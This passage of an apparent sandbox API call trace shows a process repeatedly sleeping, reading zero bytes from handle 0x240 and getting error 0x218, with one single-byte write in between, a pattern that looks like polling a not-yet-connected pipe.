	[0253.423] Sleep (dwMilliseconds=0xa) 
	[0253.438] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.438] GetLastError () returned 0x218
	[0253.438] Sleep (dwMilliseconds=0xa) 
	[0253.454] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.454] GetLastError () returned 0x218
	[0253.454] Sleep (dwMilliseconds=0xa) 
	[0253.469] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.469] GetLastError () returned 0x218
	[0253.469] Sleep (dwMilliseconds=0xa) 
	[0253.485] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.485] GetLastError () returned 0x218
	[0253.485] Sleep (dwMilliseconds=0xa) 
	[0253.548] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.548] GetLastError () returned 0x218
	[0253.548] Sleep (dwMilliseconds=0xa) 
	[0253.594] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.594] GetLastError () returned 0x218
	[0253.594] Sleep (dwMilliseconds=0xa) 
	[0253.680] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.680] GetLastError () returned 0x218
	[0253.680] Sleep (dwMilliseconds=0xa) 
	[0253.704] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.704] GetLastError () returned 0x218
	[0253.704] Sleep (dwMilliseconds=0xa) 
	[0253.719] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.719] GetLastError () returned 0x218
	[0253.719] Sleep (dwMilliseconds=0xa) 
	[0253.735] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.735] GetLastError () returned 0x218
	[0253.735] Sleep (dwMilliseconds=0xa) 
	[0253.751] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.751] GetLastError () returned 0x218
	[0253.751] Sleep (dwMilliseconds=0xa) 
	[0253.766] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.766] GetLastError () returned 0x218
	[0253.766] Sleep (dwMilliseconds=0xa) 
	[0253.782] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.782] GetLastError () returned 0x218
	[0253.782] Sleep (dwMilliseconds=0xa) 
	[0253.798] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.798] GetLastError () returned 0x218
	[0253.798] Sleep (dwMilliseconds=0xa) 
	[0253.859] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.859] GetLastError () returned 0x218
	[0253.859] Sleep (dwMilliseconds=0xa) 
	[0253.906] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.906] GetLastError () returned 0x218
	[0253.906] Sleep (dwMilliseconds=0xa) 
	[0253.953] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.953] GetLastError () returned 0x218
	[0253.953] Sleep (dwMilliseconds=0xa) 
	[0253.969] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.969] GetLastError () returned 0x218
	[0253.969] Sleep (dwMilliseconds=0xa) 
	[0253.984] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.984] GetLastError () returned 0x218
	[0253.984] Sleep (dwMilliseconds=0xa) 
	[0254.000] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.000] GetLastError () returned 0x218
	[0254.000] Sleep (dwMilliseconds=0xa) 
	[0254.016] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.016] GetLastError () returned 0x218
	[0254.016] Sleep (dwMilliseconds=0xa) 
	[0254.032] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.032] GetLastError () returned 0x218
	[0254.032] Sleep (dwMilliseconds=0xa) 
	[0254.047] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.047] GetLastError () returned 0x218
	[0254.047] Sleep (dwMilliseconds=0xa) 
	[0254.109] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.109] GetLastError () returned 0x218
	[0254.109] Sleep (dwMilliseconds=0xa) 
	[0254.156] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.156] GetLastError () returned 0x218
	[0254.156] Sleep (dwMilliseconds=0xa) 
	[0254.203] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.203] GetLastError () returned 0x218
	[0254.203] Sleep (dwMilliseconds=0xa) 
	[0254.219] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.219] GetLastError () returned 0x218
	[0254.219] Sleep (dwMilliseconds=0xa) 
	[0254.234] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.234] GetLastError () returned 0x218
	[0254.234] Sleep (dwMilliseconds=0xa) 
	[0254.249] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.250] GetLastError () returned 0x218
	[0254.250] Sleep (dwMilliseconds=0xa) 
	[0254.265] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.265] GetLastError () returned 0x218
	[0254.265] Sleep (dwMilliseconds=0xa) 
	[0254.283] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.283] GetLastError () returned 0x218
	[0254.283] Sleep (dwMilliseconds=0xa) 
	[0254.296] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.297] GetLastError () returned 0x218
	[0254.297] Sleep (dwMilliseconds=0xa) 
	[0254.374] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.374] GetLastError () returned 0x218
	[0254.374] Sleep (dwMilliseconds=0xa) 
	[0254.421] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.421] GetLastError () returned 0x218
	[0254.421] Sleep (dwMilliseconds=0xa) 
	[0254.463] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.463] GetLastError () returned 0x218
	[0254.463] Sleep (dwMilliseconds=0x3e8) 
	[0254.476] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0254.476] Sleep (dwMilliseconds=0xa) 
	[0254.483] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.483] GetLastError () returned 0x218
	[0254.484] Sleep (dwMilliseconds=0xa) 
	[0254.499] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.499] GetLastError () returned 0x218
	[0254.499] Sleep (dwMilliseconds=0xa) 
	[0254.515] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.515] GetLastError () returned 0x218
	[0254.515] Sleep (dwMilliseconds=0xa) 
	[0254.531] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.531] GetLastError () returned 0x218
	[0254.531] Sleep (dwMilliseconds=0xa) 
	[0254.546] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.547] GetLastError () returned 0x218
	[0254.547] Sleep (dwMilliseconds=0xa) 
	[0254.562] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.562] GetLastError () returned 0x218
	[0254.562] Sleep (dwMilliseconds=0xa) 
	[0254.624] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.624] GetLastError () returned 0x218
	[0254.624] Sleep (dwMilliseconds=0xa) 
	[0254.671] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.671] GetLastError () returned 0x218
	[0254.671] Sleep (dwMilliseconds=0xa) 
	[0254.767] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.767] GetLastError () returned 0x218
	[0254.767] Sleep (dwMilliseconds=0xa) 
	[0254.835] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.835] GetLastError () returned 0x218
	[0254.835] Sleep (dwMilliseconds=0xa) 
	[0254.842] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.842] GetLastError () returned 0x218
	[0254.842] Sleep (dwMilliseconds=0xa) 
	[0254.858] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.859] GetLastError () returned 0x218
	[0254.859] Sleep (dwMilliseconds=0xa) 
	[0254.874] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.874] GetLastError () returned 0x218
	[0254.874] Sleep (dwMilliseconds=0xa) 
	[0254.968] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0254.968] GetLastError () returned 0x218
	[0254.968] Sleep (dwMilliseconds=0xa) 
	[0255.014] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.014] GetLastError () returned 0x218
	[0255.014] Sleep (dwMilliseconds=0xa) 
	[0255.061] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.061] GetLastError () returned 0x218
	[0255.061] Sleep (dwMilliseconds=0xa) 
	[0255.076] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.076] GetLastError () returned 0x218
	[0255.076] Sleep (dwMilliseconds=0xa) 
	[0255.092] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.092] GetLastError () returned 0x218
	[0255.092] Sleep (dwMilliseconds=0xa) 
	[0255.109] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.109] GetLastError () returned 0x218
	[0255.109] Sleep (dwMilliseconds=0xa) 
	[0255.123] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.123] GetLastError () returned 0x218
	[0255.123] Sleep (dwMilliseconds=0xa) 
	[0255.139] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.139] GetLastError () returned 0x218
	[0255.139] Sleep (dwMilliseconds=0xa) 
	[0255.155] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.155] GetLastError () returned 0x218
	[0255.155] Sleep (dwMilliseconds=0xa) 
	[0255.218] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.218] GetLastError () returned 0x218
	[0255.218] Sleep (dwMilliseconds=0xa) 
	[0255.264] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.264] GetLastError () returned 0x218
	[0255.264] Sleep (dwMilliseconds=0xa) 
	[0255.311] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.311] GetLastError () returned 0x218
	[0255.311] Sleep (dwMilliseconds=0xa) 
	[0255.338] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.338] GetLastError () returned 0x218
	[0255.338] Sleep (dwMilliseconds=0xa) 
	[0255.342] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.342] GetLastError () returned 0x218
	[0255.342] Sleep (dwMilliseconds=0xa) 
	[0255.357] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.357] GetLastError () returned 0x218
	[0255.357] Sleep (dwMilliseconds=0xa) 
	[0255.373] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.373] GetLastError () returned 0x218
	[0255.373] Sleep (dwMilliseconds=0xa) 
	[0255.389] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.389] GetLastError () returned 0x218
	[0255.389] Sleep (dwMilliseconds=0xa) 
	[0255.404] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.404] GetLastError () returned 0x218
	[0255.404] Sleep (dwMilliseconds=0xa) 
	[0255.453] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.453] GetLastError () returned 0x218
	[0255.453] Sleep (dwMilliseconds=0xa) 
	[0255.498] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.498] GetLastError () returned 0x218
	[0255.498] Sleep (dwMilliseconds=0xa) 
	[0255.544] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.544] GetLastError () returned 0x218
	[0255.544] Sleep (dwMilliseconds=0xa) 
	[0255.564] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.564] GetLastError () returned 0x218
	[0255.564] Sleep (dwMilliseconds=0xa) 
	[0255.575] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.575] GetLastError () returned 0x218
	[0255.576] Sleep (dwMilliseconds=0xa) 
	[0255.601] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.601] GetLastError () returned 0x218
	[0255.601] Sleep (dwMilliseconds=0xa) 
	[0255.607] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.607] GetLastError () returned 0x218
	[0255.607] Sleep (dwMilliseconds=0xa) 
	[0255.622] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.622] GetLastError () returned 0x218
	[0255.622] Sleep (dwMilliseconds=0xa) 
	[0255.638] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.638] GetLastError () returned 0x218
	[0255.638] Sleep (dwMilliseconds=0xa) 
	[0255.666] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.666] GetLastError () returned 0x218
	[0255.666] Sleep (dwMilliseconds=0xa) 
	[0255.716] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.716] GetLastError () returned 0x218
	[0255.716] Sleep (dwMilliseconds=0xa) 
	[0255.761] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.761] GetLastError () returned 0x218
	[0255.761] Sleep (dwMilliseconds=0xa) 
	[0255.803] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
